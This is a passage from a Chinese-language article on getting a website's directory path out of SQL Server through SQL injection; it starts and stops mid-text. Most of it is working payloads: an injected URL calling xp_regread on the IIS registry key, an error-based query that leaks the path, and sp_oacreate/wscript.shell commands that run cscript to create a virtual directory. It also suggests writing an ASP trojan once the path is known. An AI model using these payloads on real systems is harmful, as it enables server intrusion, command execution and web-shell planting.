軟件測試開發技術SQL Server取得網站路徑的幾種方法及比較

的,暈了吧,很難有人有嗯那個耐性會堅持到那么多的,早就崩潰了或許.還有就是不能在2003下用!

不過說實話,這個方法的確是一個好方法

方法四:

這個方法是要飯的提到的,通過xp_regread等從注冊表里讀出路徑

以下推薦，獲取網頁路徑(通過存儲過程達到對注冊表的讀取)：

利用內置存儲過程 xp_regread(讀取注冊表鍵值，權限public)：

語句：http：//www.xxx.com/list.asp?classid=1;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test

varchar(20) exec master..xp_regread @rootkey= HKEY_LOCAL_MACHINE , @key=

SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ , @value_name= / , values=@test OUTPUT insert into paths

(path) values(@test)

IIS的默認路徑的在注冊表中HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\

利用爆字段將數據庫的值讀出來：

語句：http：//www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)--返回： Microsoft OLE DB Provider for

ODBC Drivers 錯誤 80040e07 [Microsoft][ODBC SQL Server Driver][SQL Server]將 varchar 值 E：\www,,201 轉換為數據類型為 int 的

列時發生語法錯誤。

這說明網頁目錄在E：\www，接下來也可以利用FSO直接寫入ASP木馬

如果得不到網頁目錄，怎么辦呢?前提你要猜到網站是否使用默認WEB，或者使用域名作為WEB。

declare @o int exec sp_oacreate wscript.shell , @o out exec sp_oamethod @o, run , NULL,’ cscript.exe c：

\inetpub\wwwroot\mkwebdir.vbs -w "默認 Web 站點" -v "e","e：\"’

在默認的WEB站點下創建一個虛擬目錄E，指向E：盤下。

declare @o int exec sp_oacreate wscript.shell , @o out exec sp_oamethod @o, run , NULL,’ cscript.exe c：

文章來源于領測軟件測試網 http://www.kjueaiud.com/